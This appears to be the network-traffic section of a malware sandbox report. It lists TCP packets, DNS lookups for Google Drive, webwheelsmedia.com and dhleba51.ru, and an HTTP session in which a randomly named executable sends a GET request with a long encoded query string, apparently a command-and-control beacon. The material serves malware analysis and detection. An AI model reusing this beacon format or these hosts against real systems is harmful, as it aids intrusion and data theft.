                                        Apr 24, 2024 07:03:06.975600958 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.975609064 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.976958036 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.977006912 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.977014065 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.978564024 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.978662968 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.978672028 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.674110889 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.677997112 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.680088997 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.680176973 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.680262089 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.681683064 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.681730032 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.681762934 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.681818962 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.685717106 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.686332941 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.686369896 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.686428070 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.689445019 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.689501047 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.689642906 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.689712048 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.693162918 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.694083929 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.694097042 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.694184065 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.697077990 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.697135925 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.697149992 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.697211027 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.700707912 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.700779915 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.700809956 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.700870037 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.704318047 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.704900980 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.704916954 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.704982042 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.707804918 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.707859039 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.707873106 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.708026886 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.711433887 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.713141918 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.713156939 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.713236094 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.714888096 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.714952946 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.716671944 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.716896057 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.716914892 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.716974974 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.720078945 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.720253944 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.720268011 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.720460892 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.723598003 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.725717068 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.725732088 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.725811005 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.726919889 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.726973057 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.726985931 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.727040052 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.730789900 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.730844975 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.730921984 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.730966091 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.733792067 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.733848095 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.733860970 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.733916044 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.737154961 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.737215996 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.737227917 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.737286091 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.740453005 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.740509033 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.740521908 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.740576982 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.743870020 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.743928909 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.743984938 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.744031906 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.746697903 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.746751070 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.746802092 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.746841908 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.749619007 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.749670982 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.749676943 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.749718904 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.749725103 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.749762058 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.752605915 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.755213022 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.755219936 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.755264997 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.755601883 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.755656004 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.757114887 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.757164001 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.757174969 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.757221937 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.760020018 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.760070086 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.760077000 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.760118008 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.762886047 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.762934923 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.763006926 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.763051987 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.765723944 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.765774012 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.765780926 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.765826941 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.768316984 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.768366098 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.768373966 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.768419981 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.771073103 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.771126032 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.771132946 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.771177053 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.773678064 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.773730040 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.773771048 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.773814917 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.776403904 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.776453972 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.776459932 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.776499033 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.778681993 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.778731108 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.778763056 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.778805971 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.781244993 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.781290054 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.781296015 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.781351089 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.783704042 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.783888102 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.783895016 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.783938885 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.786313057 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.786364079 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.786371946 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.786418915 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.788769960 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.788815022 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.789171934 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.789216995 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.791018963 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.791064978 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.792212009 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.792258978 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.792316914 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.792361021 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.794676065 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.794725895 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.794730902 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.794770002 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.796946049 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.797102928 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:00.797172070 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.797229052 CEST49713443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:04:00.797240973 CEST44349713142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:04:46.717806101 CEST4971580192.168.2.9162.241.253.78
                                        Apr 24, 2024 07:04:46.899980068 CEST8049715162.241.253.78192.168.2.9
                                        Apr 24, 2024 07:04:46.900125980 CEST4971580192.168.2.9162.241.253.78
                                        Apr 24, 2024 07:04:46.900902033 CEST4971580192.168.2.9162.241.253.78
                                        Apr 24, 2024 07:04:47.082624912 CEST8049715162.241.253.78192.168.2.9
                                        Apr 24, 2024 07:04:47.247191906 CEST8049715162.241.253.78192.168.2.9
                                        Apr 24, 2024 07:04:47.297358990 CEST4971580192.168.2.9162.241.253.78
                                        Apr 24, 2024 07:04:52.247596025 CEST8049715162.241.253.78192.168.2.9
                                        Apr 24, 2024 07:04:52.247792959 CEST4971580192.168.2.9162.241.253.78
                                        Apr 24, 2024 07:04:52.248315096 CEST4971580192.168.2.9162.241.253.78
                                        Apr 24, 2024 07:04:52.429424047 CEST8049715162.241.253.78192.168.2.9
                                        Apr 24, 2024 07:05:03.877196074 CEST4971680192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:04.213679075 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.213835001 CEST4971680192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:04.214073896 CEST4971680192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:04.550875902 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.554496050 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.554573059 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.554647923 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.554699898 CEST4971680192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:04.554704905 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.554759979 CEST4971680192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:04.554924011 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.555080891 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.555094004 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.555108070 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.555129051 CEST4971680192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:04.555143118 CEST4971680192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:04.555155993 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.555196047 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.555263042 CEST4971680192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:04.891639948 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.891750097 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.891808987 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.891859055 CEST4971680192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:04.891900063 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.891956091 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.891961098 CEST4971680192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:04.892018080 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.892031908 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.892055035 CEST4971680192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:04.892079115 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.892119884 CEST4971680192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:04.892146111 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.892163038 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.892218113 CEST4971680192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:04.892348051 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.892568111 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.892610073 CEST4971680192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:04.892653942 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.892775059 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.892832994 CEST4971680192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:04.892858028 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.892932892 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.892977953 CEST4971680192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:04.892985106 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.892999887 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.893070936 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.893100023 CEST4971680192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:04.893115044 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:04.893172979 CEST4971680192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:05.230221033 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:05.230253935 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:05.230298996 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:05.230329037 CEST4971680192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:05.230447054 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:05.230489016 CEST4971680192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:05.230494022 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:05.230536938 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:05.230573893 CEST4971680192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:05.230796099 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:05.230931997 CEST8049716195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:05.230971098 CEST4971680192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:05.719270945 CEST4971680192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:06.735192060 CEST4971780192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:07.080290079 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:07.080434084 CEST4971780192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:07.080873013 CEST4971780192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:07.425920963 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:07.428824902 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:07.428970098 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:07.428989887 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:07.429035902 CEST4971780192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:07.429176092 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:07.429220915 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:07.429224014 CEST4971780192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:07.429280043 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:07.429327965 CEST4971780192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:07.429328918 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:07.429402113 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:07.429441929 CEST4971780192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:07.429485083 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:07.429575920 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:07.429616928 CEST4971780192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:07.773720026 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:07.773737907 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:07.773838043 CEST4971780192.168.2.9195.24.68.5
                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Apr 24, 2024 07:03:03.118156910 CEST | 63784 | 53 | 192.168.2.9 | 1.1.1.1
                                        Apr 24, 2024 07:03:03.271579027 CEST | 53 | 63784 | 1.1.1.1 | 192.168.2.9
                                        Apr 24, 2024 07:03:04.226878881 CEST | 50589 | 53 | 192.168.2.9 | 1.1.1.1
                                        Apr 24, 2024 07:03:04.381294012 CEST | 53 | 50589 | 1.1.1.1 | 192.168.2.9
                                        Apr 24, 2024 07:04:46.486382008 CEST | 64756 | 53 | 192.168.2.9 | 1.1.1.1
                                        Apr 24, 2024 07:04:46.713354111 CEST | 53 | 64756 | 1.1.1.1 | 192.168.2.9
                                        Apr 24, 2024 07:05:02.944358110 CEST | 61330 | 53 | 192.168.2.9 | 1.1.1.1
                                        Apr 24, 2024 07:05:03.876254082 CEST | 53 | 61330 | 1.1.1.1 | 192.168.2.9

                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                        Apr 24, 2024 07:03:03.118156910 CEST | 192.168.2.9 | 1.1.1.1 | 0x8cb | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
                                        Apr 24, 2024 07:03:04.226878881 CEST | 192.168.2.9 | 1.1.1.1 | 0x9ab2 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
                                        Apr 24, 2024 07:04:46.486382008 CEST | 192.168.2.9 | 1.1.1.1 | 0x8ac5 | Standard query (0) | www.webwheelsmedia.com | A (IP address) | IN (0x0001) | false
                                        Apr 24, 2024 07:05:02.944358110 CEST | 192.168.2.9 | 1.1.1.1 | 0x24a6 | Standard query (0) | www.dhleba51.ru | A (IP address) | IN (0x0001) | false

                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                        Apr 24, 2024 07:03:03.271579027 CEST | 1.1.1.1 | 192.168.2.9 | 0x8cb | No error (0) | drive.google.com |  | 142.250.101.100 | A (IP address) | IN (0x0001) | false
                                        Apr 24, 2024 07:03:03.271579027 CEST | 1.1.1.1 | 192.168.2.9 | 0x8cb | No error (0) | drive.google.com |  | 142.250.101.102 | A (IP address) | IN (0x0001) | false
                                        Apr 24, 2024 07:03:03.271579027 CEST | 1.1.1.1 | 192.168.2.9 | 0x8cb | No error (0) | drive.google.com |  | 142.250.101.113 | A (IP address) | IN (0x0001) | false
                                        Apr 24, 2024 07:03:03.271579027 CEST | 1.1.1.1 | 192.168.2.9 | 0x8cb | No error (0) | drive.google.com |  | 142.250.101.101 | A (IP address) | IN (0x0001) | false
                                        Apr 24, 2024 07:03:03.271579027 CEST | 1.1.1.1 | 192.168.2.9 | 0x8cb | No error (0) | drive.google.com |  | 142.250.101.139 | A (IP address) | IN (0x0001) | false
                                        Apr 24, 2024 07:03:03.271579027 CEST | 1.1.1.1 | 192.168.2.9 | 0x8cb | No error (0) | drive.google.com |  | 142.250.101.138 | A (IP address) | IN (0x0001) | false
                                        Apr 24, 2024 07:03:04.381294012 CEST | 1.1.1.1 | 192.168.2.9 | 0x9ab2 | No error (0) | drive.usercontent.google.com |  | 142.251.2.132 | A (IP address) | IN (0x0001) | false
                                        Apr 24, 2024 07:04:46.713354111 CEST | 1.1.1.1 | 192.168.2.9 | 0x8ac5 | No error (0) | www.webwheelsmedia.com | webwheelsmedia.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                        Apr 24, 2024 07:04:46.713354111 CEST | 1.1.1.1 | 192.168.2.9 | 0x8ac5 | No error (0) | webwheelsmedia.com |  | 162.241.253.78 | A (IP address) | IN (0x0001) | false
                                        Apr 24, 2024 07:05:03.876254082 CEST | 1.1.1.1 | 192.168.2.9 | 0x24a6 | No error (0) | www.dhleba51.ru |  | 195.24.68.5 | A (IP address) | IN (0x0001) | false

                                        • drive.google.com
                                        • drive.usercontent.google.com
                                        • www.webwheelsmedia.com
                                        • www.dhleba51.ru
                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        0 | 192.168.2.9 | 49715 | 162.241.253.78 | 80 | 5248 | C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Apr 24, 2024 07:04:46.900902033 CEST | 390 | OUT | GET /im2z/?_Ny4=z4HNqRUNVhKU+Qtv1eU7JRxQK/gynbhJk0uSl0XlGEkve/f45BAiGTLGfSdewEtjJuikjLVXYXf/hVlacLZbmvfCaC2wD3OuQ9Qp/Q6XbR8wDKz6gQ==&B6H=rZ8dY HTTP/1.1
                                        Host: www.webwheelsmedia.com
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                        Apr 24, 2024 07:04:47.247191906 CEST | 713 | IN | HTTP/1.1 301 Moved Permanently
                                        Date: Wed, 24 Apr 2024 05:04:47 GMT
                                        Server: nginx/1.21.6
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 0
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        X-Redirect-By: WordPress
                                        Location: http://webwheelsmedia.com/im2z/?_Ny4=z4HNqRUNVhKU+Qtv1eU7JRxQK/gynbhJk0uSl0XlGEkve/f45BAiGTLGfSdewEtjJuikjLVXYXf/hVlacLZbmvfCaC2wD3OuQ9Qp/Q6XbR8wDKz6gQ==&B6H=rZ8dY
                                        host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                        X-Newfold-Cache-Level: 2
                                        X-Endurance-Cache-Level: 2
                                        X-nginx-cache: WordPress
                                        X-Server-Cache: true
                                        X-Proxy-Cache: MISS
                                        Set-Cookie: nfdbrandname=bluehost; expires=Sat, 22 Apr 2034 05:04:47 GMT; Max-Age=315360000; path=/


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        1 | 192.168.2.9 | 49716 | 195.24.68.5 | 80 | 5248 | C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe
                                        Timestamp | Bytes transferred | Direction | Data
